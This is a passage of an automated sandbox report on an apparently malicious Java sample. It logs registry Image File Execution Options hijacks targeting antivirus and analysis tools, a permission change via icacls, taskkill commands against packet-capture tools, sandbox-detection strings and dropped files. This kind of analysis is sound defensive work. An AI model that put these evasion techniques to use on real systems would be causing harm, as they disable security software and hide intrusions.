Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger

Changes image file execution options

Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger

Uses cacls to modify the permissions of files

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000001.00000002.2962226941.000000001545B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /FF
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
